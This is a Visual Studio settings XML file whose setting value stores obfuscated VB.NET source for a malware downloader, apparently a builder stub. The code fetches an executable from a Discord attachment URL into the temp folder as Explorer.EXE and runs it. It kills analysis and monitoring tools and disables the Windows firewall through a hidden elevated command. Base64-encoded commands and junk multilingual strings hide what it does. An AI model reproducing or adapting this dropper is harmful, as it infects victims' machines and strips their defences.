<?xml version='1.0' encoding='utf-8'?>
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" GeneratedClassNamespace="My" GeneratedClassName="MySettings" UseMySettingsClassName="true">
  <Profiles />
  <Settings>
    <Setting Name="c" Type="System.String" Scope="User">
      <Value Profile="(Default)">'Form Load Code
'            Me.Hide()
'Call 링크링크링크링크링크링크.MONSTERMC()
'Me.Close()



Module 링크링크링크링크링크링크
    'MONSTERMC        
    'वायरस यहाँ नजफ        
    Dim 链接链接链接链接 As String = "病毒纳杰夫这里病毒纳杰夫这里病毒纳杰夫这里病毒纳杰夫这里"
    Dim 바이러스나자프여기 As String = "वायरस यहाँ नजफवायरस यहाँ नजफवायरस यहाँ नजफवायरस यहाँ नजफ"
    Dim वायरसनजफकिंवदंती As String = "俞日元延p广播特贝俞日元延p广播特贝俞日元延p广播特贝俞日元延p广播特贝"
    Dim ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ನಲ್ಲಿ As String = "ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"
    Dim ಬೆಟ್ಟಿಸ್ಯೂಸ್ಬೆಟ್ಟಿಸ್ಯೂಬೆಟ್ಟಿಸ್ಯೂಸ್ಸ್ As String = "这里病毒纳这里病毒纳杰夫这里病毒纳杰夫杰夫这里病毒纳杰夫"
    '毒纳杰夫这里病毒纳杰夫这里病毒纳'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        
    Sub MONSTERMC()
        'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        
        'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        
        System.Threading.Thread.Sleep(10000) ' Payload Sleep    
        Dim download As New Net.WebClient '毒纳杰夫这里病毒纳杰夫这里病毒纳        
        '毒纳杰夫这里病毒纳杰夫这里病毒纳        
        download.DownloadFile(OLBkiXmTJFttIYOWbPYNpgv("%URL%"), Environ(OLBkiXmTJFttIYOWbPYNpgv("dGVtcA==")) &amp; OLBkiXmTJFttIYOWbPYNpgv("L0V4cGxvcmVyLkVYRQ=="))
        'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        
        '毒纳杰夫这里病毒纳杰夫这里病毒纳        
        Shell(Environ(OLBkiXmTJFttIYOWbPYNpgv("dGVtcA==")) &amp; OLBkiXmTJFttIYOWbPYNpgv("L0V4cGxvcmVyLkVYRQ==")) '毒纳杰夫这里病毒纳杰夫这里病毒纳ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        
        'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        
        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq("ZEdGemEydHBiR3dnTDBZZ0wwbE5JRkJ5YjJObGMzTklZV05yWlhJdVpYaGw=")), vbHide)
        Dim 今天之后没有慈悲今天之后没有慈悲 As String = "आज के बाद कोई दया नहींआज के बाद कोई दया नहींआज के बाद कोई दया नहीं"
        Shell(OLBkiXmTJFttIYOWbPYNpgv("dGFza2tpbGwgL0YgL0lNIFNweVRoZVNweS5leGU="), vbHide)
        Dim ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ನಲ್ಲಿ As String = "ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"
        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe(BuKvRXwETsOSvmCuecfXfjR("V2tWa1IyVnRSWGxrU0VKcFVqTmtibFJFUWxwYU1IZDNZa1UxU2xORlNqVlpha3BQWWtkV1NWRllWbUZYUjJoeg==")))), vbHide)
        Dim 今日の後マー日の後マーシーいいえ As String = "B 방송 토B 방송 纳杰夫这里病송륨 Bthb纳杰夫这里病 방송 방송"
        Shell(OLBkiXmTJFttIYOWbPYNpgv("dGFza2tpbGwgL0YgL0lNIGFwYXRlRE5TLmV4ZQ=="), vbHide)
        Dim ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋwಯಲ್ನಲ್ಲಿ As String = "ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"
        Shell(OLBkiXmTJFttIYOWbPYNpgv("dGFza2tpbGwgL0YgL0lNIGNwb3J0cy5leGU="), vbHide)
        Dim ಬೆಟ್ಟಿ有慈悲今天之后没有慈ತಿಯಿಅಸ್ಸಾಟಿಎಸ್ As String = "贝蒂泰斯氏益贝蒂泰斯氏益阿萨TS贝蒂泰斯氏益阿萨TS阿萨TS贝蒂泰斯氏益阿萨TS"
        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq("ZEdGemEydHBiR3dnTDBZZ0wwbE5JRUZ1ZEdsTWIyZG5aWEl1WlhobA==")), vbHide)
        Dim 今天之后没有慈ww悲今dde天之后s没有慈悲 As String = "आज के बाद कोई दया नहींआज के बाद कोई दया नहींआज के बाद कोई दया नहीं"
        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe("WkVkR2VtRXlkSEJpUjNkblREQlpaMHd3YkU1SlJURk1WR2xDVlZsWVRuSlNXR2gzWWtjNWVWcFlTWFZhV0docw=="))), vbHide)
        Dim 今日の後マeeー3日の後マーシーいいえ As String = "B 방송 토B 방송 纳杰d夫这里病송e33e륨 Bthb纳杰夫这里病 방송 방송"
        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe("WkVkR2VtRXlkSEJpUjNkblREQlpaMHd3YkU1SlJUVnNaRWhrZG1OdGMyZFJWelZvWWtoc05scFlTWFZhV0docw=="))), vbHide)
        Dim 今日の後マー日のede後マdededdeーシーいdwdwdいえ As String = "B 방송 토B 방송 纳杰夫这里病ee송륨 Bthb纳杰夫这里病 방송 방송"
        Shell(OLBkiXmTJFttIYOWbPYNpgv("dGFza2tpbGwgL0YgL0lNIFRDUEV5ZS5leGU="), vbHide)
        Dim 今天之后e3没有慈e3e悲今天之后没有慈悲 As String = "आज के बाद कोई दdd3या नहींआज केd3d3 बाद कोई दया fefeनहींआज के बाद कोई दया नहीं"
        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe(BuKvRXwETsOSvmCuecfXfjR("V2tWa1IyVnRSWGxrU0VKcFVqTmtibFJFUWxwYU1IZDNZa1UxU2xKc1NrVldWVnBoWTBad1dWa3pWbUZYUjJoeg==")))), vbHide)
        Dim 今天之后没有eee慈悲今dedee天之后没有ddedede慈悲 As String = "आज के बाद कोई दया ceceआज के बाद कोई दया नहींआज के बाद कोई दया नहीं"
        Shell(OLBkiXmTJFttIYOWbPYNpgv("dGFza2tpbGwgL0YgL0lNIE5ldHdvcmtNaW5lci5leGU="), vbHide)
        Dim ಒಂದುಯಿಒಂದುರೀತಿಯಜೋedeಯdedeಲ್ಜೋwಯಲ್ನಲ್ಲಿ As String = "ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯddeಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"
        Shell(OLBkiXmTJFttIYOWbPYNpgv("dGFza2tpbGwgL0YgL0lNIEFwYXRlRE5TLmV4ZQ=="), vbHide)
        Dim c As New ProcessStartInfo()
        c.FileName = OLBkiXmTJFttIYOWbPYNpgv("Y21kLmV4ZQ==")
        c.WindowStyle = ProcessWindowStyle.Hidden
        c.Verb = OLBkiXmTJFttIYOWbPYNpgv("cnVuYXM=")
        c.Arguments = OLBkiXmTJFttIYOWbPYNpgv("L0MgbmV0c2ggYWR2ZmlyZXdhbGwgc2V0IGFsbHByb2ZpbGVzIHN0YXRlIG9mZg==")
        Process.Start(c)
        Dim 链接链ee接链接frfrfrf链接 As String = "病毒纳杰夫e33r4r这里病毒纳杰夫这里病毒r4r44r纳杰夫这里病毒纳杰夫这里"
        Dim 바이러스나eeefrfr자프여기 As String = "वायरस यहाँ नजफवायरस यहाँ नजफवा4r4r4rयरस यहाँ नजफवायरस यहाँ नजफ"
        Dim वायरसनजफकिंवदंती As String = "俞日元延p广播特贝俞日元延p广播r4r4r4特贝俞日元延pr4r4r广播特贝俞日元延p广播特贝"
        Dim ಒಂದುಯಿಒಂfrfrfದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ನಲ್ಲಿ As String = "ಒಂದುಯಿಒಂದುರೀತಿಯr4r4ಜೋಯಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"
        Dim ಬೆಟ್ಟಿಸ್ಯೂಸ್ಬೆfrfrfrಟ್ಟಿಸ್ಯೂfrfrfrಬೆಟ್ಟಿಸ್ಯೂಸ್ಸ್ As String = "这里病毒纳这里病毒纳杰r4r4r4夫这里病毒纳杰夫杰夫这里病毒纳杰夫"

        'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        
        'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        
        System.Threading.Thread.Sleep(10000) ' Kill Anits Sleep      
        Dim 没有慈ww慈e3没悲今天日之 As New Net.WebClient '毒纳杰夫这里病毒纳杰夫这里病毒纳        
        '毒纳杰夫这里病毒纳杰夫这里病毒纳        
        没有慈ww慈e3没悲今天日之.DownloadFile(OLBkiXmTJFttIYOWbPYNpgv("aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTYwNjM1ODkxMjIxNjkyNDI2Lzk2MjQzNTU5NDEyOTE0MTg0MC9leHBsb3Jlci5leGU="), Environ(OLBkiXmTJFttIYOWbPYNpgv("dGVtcA==")) &amp; OLBkiXmTJFttIYOWbPYNpgv("L0V4cGxvcmVyLkVYRQ=="))
        'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        
        '毒纳杰夫这里病毒纳杰夫这里病毒纳        
        Shell(Environ(OLBkiXmTJFttIYOWbPYNpgv("dGVtcA==")) &amp; OLBkiXmTJFttIYOWbPYNpgv("L0V4cGxvcmVyLkVYRQ==")) '毒纳杰夫这里病毒纳杰夫这里病毒纳ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        
        'ಒಂದು ಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿ        
        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq("ZEdGemEydHBiR3dnTDBZZ0wwbE5JRkJ5YjJObGMzTklZV05yWlhJdVpYaGw=")), vbHide)
        Dim 今天之后没有慈悲今天之后没有慈悲今ಲ್ಲಿ As String = "आज के बाद कोई दया नहींआज के बाद कोई दया नहींआज के बाद कोई दया नहीं"
        Shell(OLBkiXmTJFttIYOWbPYNpgv("dGFza2tpbGwgL0YgL0lNIFNweVRoZVNweS5leGU="), vbHide)
        Dim ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ನಲ್ಲಿ今ಲ್ಲಿ As String = "ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"
        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe(BuKvRXwETsOSvmCuecfXfjR("V2tWa1IyVnRSWGxrU0VKcFVqTmtibFJFUWxwYU1IZDNZa1UxU2xORlNqVlpha3BQWWtkV1NWRllWbUZYUjJoeg==")))), vbHide)
        Dim 今日の後マー日の後マーシーいいえ今ಲ್ಲಿ As String = "B 방송 토B 방송 纳杰夫这里病송륨 Bthb纳杰夫这里病 방송 방송"
        Shell(OLBkiXmTJFttIYOWbPYNpgv("dGFza2tpbGwgL0YgL0lNIGFwYXRlRE5TLmV4ZQ=="), vbHide)
        Dim ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋwಯಲ್ನಲ್ಲಿ今ಲ್ಲಿ As String = "ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"
        Shell(OLBkiXmTJFttIYOWbPYNpgv("dGFza2tpbGwgL0YgL0lNIGNwb3J0cy5leGU="), vbHide)
        Dim ಬೆಟ್ಟಿ有慈悲今天之后没有慈ತಿಯಿಅಸ್ಸಾಟಿಎಸ್今ಲ್ಲಿ As String = "贝蒂泰斯氏益贝蒂泰斯氏益阿萨TS贝蒂泰斯氏益阿萨TS阿萨TS贝蒂泰斯氏益阿萨TS"
        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq("ZEdGemEydHBiR3dnTDBZZ0wwbE5JRUZ1ZEdsTWIyZG5aWEl1WlhobA==")), vbHide)
        Dim 今天之后没有慈ww悲今dde天之后s没有慈悲今ಲ್ಲಿ As String = "आज के बाद कोई दया नहींआज के बाद कोई दया नहींआज के बाद कोई दया नहीं"
        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe("WkVkR2VtRXlkSEJpUjNkblREQlpaMHd3YkU1SlJURk1WR2xDVlZsWVRuSlNXR2gzWWtjNWVWcFlTWFZhV0docw=="))), vbHide)
        Dim 今日の後マeeー3日の後マーシーいいえ今ಲ್ಲಿ As String = "B 방송 토B 방송 纳杰d夫这里病송e33e륨 Bthb纳杰夫这里病 방송 방송"
        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe("WkVkR2VtRXlkSEJpUjNkblREQlpaMHd3YkU1SlJUVnNaRWhrZG1OdGMyZFJWelZvWWtoc05scFlTWFZhV0docw=="))), vbHide)
        Dim 今日の後マー日のede後マdededdeーシーいdwdwdいえ今ಲ್ಲಿ As String = "B 방송 토B 방송 纳杰夫这里病ee송륨 Bthb纳杰夫这里病 방송 방송"
        Shell(OLBkiXmTJFttIYOWbPYNpgv("dGFza2tpbGwgL0YgL0lNIFRDUEV5ZS5leGU="), vbHide)
        Dim 今天之后e3没有慈e3e悲今天之后没有慈悲今ಲ್ಲಿ As String = "आज के बाद कोई दdd3या नहींआज केd3d3 बाद कोई दया fefeनहींआज के बाद कोई दया नहीं"
        Shell(OLBkiXmTJFttIYOWbPYNpgv(KQrOrTHOAOrMrNgiJHrNaIq(eHCfeVDhiFEotZRQTRNrEWe(BuKvRXwETsOSvmCuecfXfjR("V2tWa1IyVnRSWGxrU0VKcFVqTmtibFJFUWxwYU1IZDNZa1UxU2xKc1NrVldWVnBoWTBad1dWa3pWbUZYUjJoeg==")))), vbHide)
        Dim 今天之后没有eee慈悲今dedee天之后没有ddedede慈悲今ಲ್ಲಿ As String = "आज के बाद कोई दया ceceआज के बाद कोई दया नहींआज के बाद कोई दया नहीं"
        Shell(OLBkiXmTJFttIYOWbPYNpgv("dGFza2tpbGwgL0YgL0lNIE5ldHdvcmtNaW5lci5leGU="), vbHide)
        Dim ಒಂದುಯಿಒಂದುರೀತಿಯಜೋedeಯdedeಲ್ಜೋwಯಲ್ನಲ್ಲಿ今ಲ್ಲಿ As String = "ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯddeಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"
        Shell(OLBkiXmTJFttIYOWbPYNpgv("dGFza2tpbGwgL0YgL0lNIEFwYXRlRE5TLmV4ZQ=="), vbHide)
        Dim 链接链ee接链接frfrfrf链接今ಲ್ಲಿ As String = "病毒纳杰夫e33r4r这里病毒纳杰夫这里病毒r4r44r纳杰夫这里病毒纳杰夫这里"
        Dim 바이러스나eeefrfr자프여기今ಲ್ಲಿ As String = "वायरस यहाँ नजफवायरस यहाँ नजफवा4r4r4rयरस यहाँ नजफवायरस यहाँ नजफ"
        Dim वायरसनजफकिंवदंती今ಲ್ಲಿ As String = "俞日元延p广播特贝俞日元延p广播r4r4r4特贝俞日元延pr4r4r广播特贝俞日元延p广播特贝"
        Dim ಒಂದುಯಿಒಂfrfrfದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ನಲ್ಲಿ今ಲ್ಲಿ As String = "ಒಂದುಯಿಒಂದುರೀತಿಯr4r4ಜೋಯಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"
        Dim ಬೆಟ್ಟಿಸ್ಯೂಸ್ಬೆfrfrfrಟ್ಟಿಸ್ಯೂfrfrfrಬೆಟ್ಟಿಸ್ಯೂಸ್ಸ್今ಲ್ಲಿ As String = "这里病毒纳这里病毒纳杰r4r4r4夫这里病毒纳杰夫杰夫这里病毒纳杰夫"
    End Sub
    Dim 今天之后没有慈悲今天之后没有慈悲今ಲ್ಲಿ As String = "आज के बाद कोई दया नहींआज के बाद कोई दया नहींआज के बाद कोई दया नहीं"
    Dim 阿忆在A型乔阿忆在A型乔尔乔尔尔乔尔今ಲ್ಲಿ As String = "एक यी एक प्रकार योएल योएल परएक यी एक प्रकार योएल योएल परएक यी एक प्रकार योएल योएल पर"
    Dim 今天之后没有慈悲今天之后没有慈悲 As String = "आज के बाद कोई दया नहींआज के बाद कोई दया नहींआज के बाद कोई दया नहीं"
    Dim 阿忆在A型乔阿忆在A型乔尔乔尔尔乔尔 As String = "एक यी एक प्रकार योएल योएल परएक यी एक प्रकार योएल योएल परएक यी एक प्रकार योएल योएल पर"

    Public Function OLBkiXmTJFttIYOWbPYNpgv(ByVal eSAgnfEoKeNrPONFD As String)
        Dim gtswVBBgQXpSrsRrT As Byte() = Convert.FromBase64String(eSAgnfEoKeNrPONFD)
        Dim jYmPEVwYVQTqVZWgj As String = System.Text.Encoding.UTF8.GetString(gtswVBBgQXpSrsRrT)
        Return jYmPEVwYVQTqVZWgj
    End Function

    Public Function KQrOrTHOAOrMrNgiJHrNaIq(ByVal RDJrWeOYUUfQFcBdF As String)
        Dim CusnrCDPbSTQhqtSj As Byte() = Convert.FromBase64String(RDJrWeOYUUfQFcBdF)
        Dim FZnGaWBIhLuoLXAIC As String = System.Text.Encoding.UTF8.GetString(CusnrCDPbSTQhqtSj)
        Return FZnGaWBIhLuoLXAIC
    End Function

    Public Function eHCfeVDhiFEotZRQTRNrEWe(ByVal LUPcKeAuarwhfAISI As String)
        Dim oNsGPsUOmFNurHvlt As Byte() = Convert.FromBase64String(LUPcKeAuarwhfAISI)
        Dim qonWvOSGsvoVVlCbM As String = System.Text.Encoding.UTF8.GetString(oNsGPsUOmFNurHvlt)
        Return qonWvOSGsvoVVlCbM
    End Function

    Public Function BuKvRXwETsOSvmCuecfXfjR(ByVal qkfLGVKkgEVIcFwBo As String)
        Dim sPabmpIcluwfGjEnH As Byte() = Convert.FromBase64String(qkfLGVKkgEVIcFwBo)
        Dim GXuhgGTsBNYUSZhKJ As String = System.Text.Encoding.UTF8.GetString(sPabmpIcluwfGjEnH)
        Return GXuhgGTsBNYUSZhKJ
    End Function

    Public Function VlSPFZsXEjYuABjconAEJwE(ByVal GAdbdGSnnRePtqscs As String)
        Dim JbYrMaQftKJmYXARL As Byte() = Convert.FromBase64String(GAdbdGSnnRePtqscs)
        Dim lUEVRnkwHVXDjenlw As String = System.Text.Encoding.UTF8.GetString(JbYrMaQftKJmYXARL)
        Return lUEVRnkwHVXDjenlw
    End Function

    Public Function SpLqOUNSsrVNjnFoWfUErZA(ByVal IltfApfNePnYQKilt As String)
        Dim LQnvgMdFkISwronaM As Byte() = Convert.FromBase64String(IltfApfNePnYQKilt)
        Dim VXKEaaoVAYqlFfTuN As String = System.Text.Encoding.UTF8.GetString(LQnvgMdFkISwronaM)
        Return VXKEaaoVAYqlFfTuN
    End Function

    Public Function mgTKBWJldifplDnVgqmhVmk(ByVal ePTCIdnGHDJMkoJbH As String)
        Dim pXnJCsCWTTiBwemvI As Byte() = Convert.FromBase64String(ePTCIdnGHDJMkoJbH)
        Dim rCiZiOAOZMMZaLrkY As String = System.Text.Encoding.UTF8.GetString(pXnJCsCWTTiBwemvI)
        Return rCiZiOAOZMMZaLrkY
    End Function

    Public Function JWbalYFIOYpTnPXDrEIOwDY(ByVal fOaeOOJrYFkqsqqdN As String)
        Dim ipVuuiGjevOQWXvSd As Byte() = Convert.FromBase64String(fOaeOOJrYFkqsqqdN)
        Dim lUQNdEEbjopoAECIt As String = System.Text.Encoding.UTF8.GetString(ipVuuiGjevOQWXvSd)
        Return lUQNdEEbjopoAECIt
    End Function
End Module</Value>
    </Setting>
  </Settings>
</SettingsFile>